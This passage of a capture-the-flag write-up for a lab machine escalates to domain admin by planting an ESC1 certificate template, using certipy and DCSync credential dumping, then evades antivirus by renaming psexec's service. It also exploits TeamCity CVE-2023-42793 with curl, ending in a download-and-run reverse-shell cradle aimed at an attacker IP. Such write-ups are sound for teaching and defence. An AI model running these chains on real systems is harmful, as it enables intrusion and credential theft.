Finding online resources to exploit this scenario proved exceptionally challenging. The sole reference available on adding a new template using Powershell was a [talk by Mr. Ashley McGlone](https://www.youtube.com/watch?v=NWrVsSRzABw)  
He also shared the tools on the GitHub repo: <https://github.com/GoateePFE/ADCSTemplate>

Since we have access to `CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb`, we can add a vulnerable template and exploit the said template.  
But first, we need to export a vulnerable template. I exported the `UserAuthentication` template from the box Escape. It was vulnerable to ESC1.

First, I set up an SMB share on my VM:

```console
opcode@debian$ sudo smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

Next, I added it to the machine Escape and transferred the module:

```console
PS C:\> net use \\10.10.14.116\crate opcode /user:opcode
PS C:\> copy \\10.10.14.116\crate\ADCSTemplate.psm1 \Windows\Tasks\ADCSTemplate.psm1
```

We can import the module and export the vulnerable template now:

```console
PS C:\Windows\Tasks> Import-Module C:\Windows\Tasks\ADCSTemplate.psm1
PS C:\Windows\Tasks> Export-ADCSTemplate -DisplayName UserAuthentication > .\ESC1.json
```

Then, I transferred the exported JSON to my VM:

```console
PS C:\Windows\Tasks> copy \Windows\Tasks\ESC1.json \\10.10.14.116\crate\ESC1.json
```

After that, I started the SMB share again and added it to Coder:

```console
opcode@debian$ sudo smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

```console
PS C:\Windows\Tasks> net use \\10.10.14.116\crate opcode /user:opcode
PS C:\Windows\Tasks> copy \\10.10.14.116\crate\ADCSTemplate.psm1 \Windows\Tasks\ADCSTemplate.psm1
PS C:\Windows\Tasks> copy \\10.10.14.116\crate\ESC1.json \Windows\Tasks\ESC1.json 
```

Now we can import the `ADCSTemplate` module and then import the vulnerable template:

```console
PS C:\Windows\Tasks> Import-Module C:\Windows\Tasks\ADCSTemplate.psm1
PS C:\Windows\Tasks> New-ADCSTemplate -DisplayName ESC1 -JSON (Get-Content .\ESC1.json -Raw) -Publish -Identity 'coder\PKI Admins' 
```

If we use [certipy](https://github.com/ly4k/Certipy),

```console
opcode@debian$ certipy find -u 'e.black' -p 'ypOSJXPqlDOxxbQSfEERy300' -dc-ip 10.10.11.207 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'coder-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'coder-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'coder-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'coder-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : coder-DC01-CA
    DNS Name                            : dc01.coder.htb
    Certificate Subject                 : CN=coder-DC01-CA, DC=coder, DC=htb
    Certificate Serial Number           : 2180F0D10CFECB9840260D0730724BDF
    Certificate Validity Start          : 2022-06-29 03:51:44+00:00
    Certificate Validity End            : 2052-06-29 04:01:44+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CODER.HTB\Administrators
      Access Rights
        ManageCertificates              : CODER.HTB\Administrators
                                          CODER.HTB\Domain Admins
                                          CODER.HTB\Enterprise Admins
        ManageCa                        : CODER.HTB\Administrators
                                          CODER.HTB\Domain Admins
                                          CODER.HTB\Enterprise Admins
        Enroll                          : CODER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : ESC1
    Display Name                        : ESC1
    Certificate Authorities             : coder-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CODER.HTB\PKI Admins
      Object Control Permissions
        Owner                           : CODER.HTB\Erron Black
        Full Control Principals         : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
        Write Owner Principals          : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
        Write Dacl Principals           : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
        Write Property Principals       : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'CODER.HTB\\PKI Admins' can enroll, enrollee supplies subject and template allows client authentication
      ESC4                              : Template is owned by CODER.HTB\Erron Black
```

## Abusing ESC1 for Escalation of Privileges

All that's left is to abuse this ESC1 vulnerability with `certipy`

```console
opcode@debian$ sudo ntpdate coder.htb
opcode@debian$ certipy req -username e.black@coder.htb -password ypOSJXPqlDOxxbQSfEERy300 -ca coder-DC01-CA -target dc01.coder.htb -template ESC1 -upn administrator@coder.htb -dns dc01.coder.htb       
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with multiple identifications
    UPN: 'administrator@coder.htb'
    DNS Host Name: 'dc01.coder.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_dc01.pfx'
```

For some reason, I have to run `certipy` commands multiple times to get them to work.  
We can perform Pass-the-Certificate to obtain a TGT and authenticate:

```console
opcode@debian$ certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.11.207 -username administrator -domain coder.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'administrator@coder.htb'
    [1] DNS Host Name: 'dc01.coder.htb'
> 0
[*] Using principal: administrator@coder.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@coder.htb': aad3b435b51404eeaad3b435b51404ee:807726fcf9f188adc26eeafd7dc16bb7
```

For identification, I selected 0.

The obtained ticket can be used with `secretsdump.py` to perform DCsync:

```console
opcode@debian$ export KRB5CCNAME=`pwd`/administrator.ccache
opcode@debian$ secretsdump.py coder.htb/administrator@dc01.coder.htb -no-pass -k -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:807726fcf9f188adc26eeafd7dc16bb7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26000ce1f6ca4029ec5d3a95631e797c:::
coder.htb\e.black:1106:aad3b435b51404eeaad3b435b51404ee:e1b96bbb66a073787a3310b5a956200d:::
coder.htb\c.cage:1107:aad3b435b51404eeaad3b435b51404ee:3ab6e9f70dbc0d19623be042d224b993:::
coder.htb\j.briggs:1108:aad3b435b51404eeaad3b435b51404ee:e38976c0b20e3e41e9c62da792115a33:::
coder.htb\l.kang:1109:aad3b435b51404eeaad3b435b51404ee:b8aba4878e4777864b292731ac88b4cd:::
coder.htb\s.blade:1110:aad3b435b51404eeaad3b435b51404ee:4e4a79beed7d042627d0a7b10f5d008a:::
coder.htb\svc_teamcity:5101:aad3b435b51404eeaad3b435b51404ee:4c5a6890e09834a6834dbf7a76bf20cb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:86a6a038ff6058c56a74e2e35008f6b037b8e7bca8c75cc5ee4495f77d0be71e
Administrator:aes128-cts-hmac-sha1-96:6d63b0853502cbbc8c8e40ad8fe88fa3
Administrator:des-cbc-md5:37feabd9d9575785
krbtgt:aes256-cts-hmac-sha1-96:aeb517a1efec8b79479cb1432e734555bc1039bcbd77bcdc39234b37199a70d3
krbtgt:aes128-cts-hmac-sha1-96:2bab4af978e4cee0b58fa1d377d35981
krbtgt:des-cbc-md5:100489b5839798cb
coder.htb\e.black:aes256-cts-hmac-sha1-96:ccb6c47af9a05d91e7610fe396cd8ffcc0e51279a2eee253fab1fb40536a5a85
coder.htb\e.black:aes128-cts-hmac-sha1-96:650ad0d49ab4bcff325a7f2a846d433f
coder.htb\e.black:des-cbc-md5:89290da2c2cd16ec
coder.htb\c.cage:aes256-cts-hmac-sha1-96:ea9cc2144c3106e9325b1ddda16c27c644d9f9b7e95098581ceba19c75d9b296
coder.htb\c.cage:aes128-cts-hmac-sha1-96:2cff13848c9e8d07339a6ab41bf72088
coder.htb\c.cage:des-cbc-md5:fd6d578510df1af1
coder.htb\j.briggs:aes256-cts-hmac-sha1-96:ec3ac8b99094903a3ca006a725dc0867666347efb4baf04d8b2f8b0305ab65ee
coder.htb\j.briggs:aes128-cts-hmac-sha1-96:39050d78545c40645fa889c13200f8f7
coder.htb\j.briggs:des-cbc-md5:7f5286d35def8f15
coder.htb\l.kang:aes256-cts-hmac-sha1-96:d7eb03d2695638c4ba423cd88e22dcdd7c0f6da996e5d6ed3af6c6d7e6c56661
coder.htb\l.kang:aes128-cts-hmac-sha1-96:25ad8331aa0fa2b26e220040b9e55937
coder.htb\l.kang:des-cbc-md5:571a573e61ced640
coder.htb\s.blade:aes256-cts-hmac-sha1-96:ceeab374597121113f3bdee3aab1fed0522506909b2f1ec24dfe36045eb3c252
coder.htb\s.blade:aes128-cts-hmac-sha1-96:69f4cada02748fba948e4c15460add9e
coder.htb\s.blade:des-cbc-md5:26eca8ad9deaada2
coder.htb\svc_teamcity:aes256-cts-hmac-sha1-96:b6c7ed72b4434a89c56295df6b42ca68937702dda15f90f23423e8712abce030
coder.htb\svc_teamcity:aes128-cts-hmac-sha1-96:d6604e2fadb40bbf71708e7b9c9734a7
coder.htb\svc_teamcity:des-cbc-md5:264ab5645ed91c86
DC01$:aes256-cts-hmac-sha1-96:a43b686fdd5f2e576ad834c5b1d4327dd5bdbd3ec579677343a2c6c43c8f1740
DC01$:aes128-cts-hmac-sha1-96:22192237a3cb399c19a6b469dcd1cba8
DC01$:des-cbc-md5:cb9758c162ba4943
[*] Cleaning up... 
```

We can also use `psexec.py` to obtain a shell as system. But on this box, it would be blocked by AV as [RemComSvc](https://github.com/kavika13/RemCom) (used to provide PSEXEC-like functionality) is heavily signatured by AV products.  
Therefore, I'd use `lgCBnftfSvc.exe` to bypass detection. Please refer to [my write-up for Stealth](https://gitlab.com/0pcode/thm-scribbles/-/blob/main/Stealth/README.md#post-privilege-escalation-spoils) for details:

```console
opcode@debian$ sed -i "s/RemCom_/lgCBnftf_/g" /home/opcode/.local/bin/psexec.py
opcode@debian$ export KRB5CCNAME=`pwd`/administrator.ccache
opcode@debian$ psexec.py coder.htb/administrator@dc01.coder.htb -no-pass -k -file /home/opcode/CTF/windows/lgCBnftfSvc.exe
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on dc01.coder.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OvCNnjvB.exe
[*] Opening SVCManager on dc01.coder.htb.....
[*] Creating service bPOV on dc01.coder.htb.....
[*] Starting service bPOV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4131]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

To reverse the changes to `psexec.py`, you can use:

```console
opcode@debian$ sed -i "s/lgCBnftf_/RemCom_/g" /home/opcode/.local/bin/psexec.py
```

## Unintended approach: TeamCity authentication bypass and remote code execution (CVE-2023-42793)

Several months after the box release, a critical vulnerability in TeamCity, CVE-2023-42793, was discovered.  
It is an authentication bypass vulnerability resulting in Remote Code Execution (RCE) on JetBrains TeamCity Server prior to version 2023.05.4  
The version in this box is 2022.10 (build 116751)

The `PRIOn Team` have a blog on abusing this vulnerability: [CVE-2023-42793 - Attacking & Defending JetBrains TeamCity](https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity)

This vulnerability allows any request ending with `/RPC2` to bypass authorization.  
The initial user generated during installation holds administrator privileges, thus being assigned the ID 1.  
For such a user, the attacker can create an authentication token via the POST request `/app/rest/users/<userLocator>/tokens/RPC2`.

```console
opcode@debian$ curl -k -XPOST 'https://teamcity-dev.coder.htb/app/rest/users/id:1/tokens/RPC2' -H 'Content-Length: 0'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-01-13T23:11:23.982-08:00" value="eyJ0eXAiOiAiVENWMiJ9.XzJqay1hTElFb2gxRVdOdEhrVkRLalYxUms0.MTc5NmUyNmMtMGFkNy00MjBmLTk2YmItN2JkYWRlNjRjMjgy"/>
```

The obtained access token can be used to enable the debug API endpoint (administrator privileges are needed):

```console
opcode@debain$ curl -k -XPOST 'https://teamcity-dev.coder.htb/admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.XzJqay1hTElFb2gxRVdOdEhrVkRLalYxUms0.MTc5NmUyNmMtMGFkNy00MjBmLTk2YmItN2JkYWRlNjRjMjgy' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
```

Once enabled, the debug API endpoint can be used to run arbitrary commands:

```console
opcode@parrot$ curl -k -XPOST 'https://teamcity-dev.coder.htb/app/rest/debug/processes?exePath=whoami' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.XzJqay1hTElFb2gxRVdOdEhrVkRLalYxUms0.MTc5NmUyNmMtMGFkNy00MjBmLTk2YmItN2JkYWRlNjRjMjgy' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
StdOut:coder\svc_teamcity

StdErr: 
Exit code: 0
Time: 85ms
```

To get a shell:

```console
opcode@parrot$ curl -k -XPOST 'https://teamcity-dev.coder.htb/app/rest/debug/processes?exePath=powershell.exe&params=IEX(IWR%20http://10.10.14.116:8000/Invoke-Rabids.ps1%20-UseBasicParsing);Invoke-Rabids%2010.10.14.116%209001' -H 'Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.XzJqay1hTElFb2gxRVdOdEhrVkRLalYxUms0.MTc5NmUyNmMtMGFkNy00MjBmLTk2YmItN2JkYWRlNjRjMjgy' -H 'Content-Type: text/plain' -H 'Content-Length: 0'
```

This exploit allows us to skip the entire TOTP part.
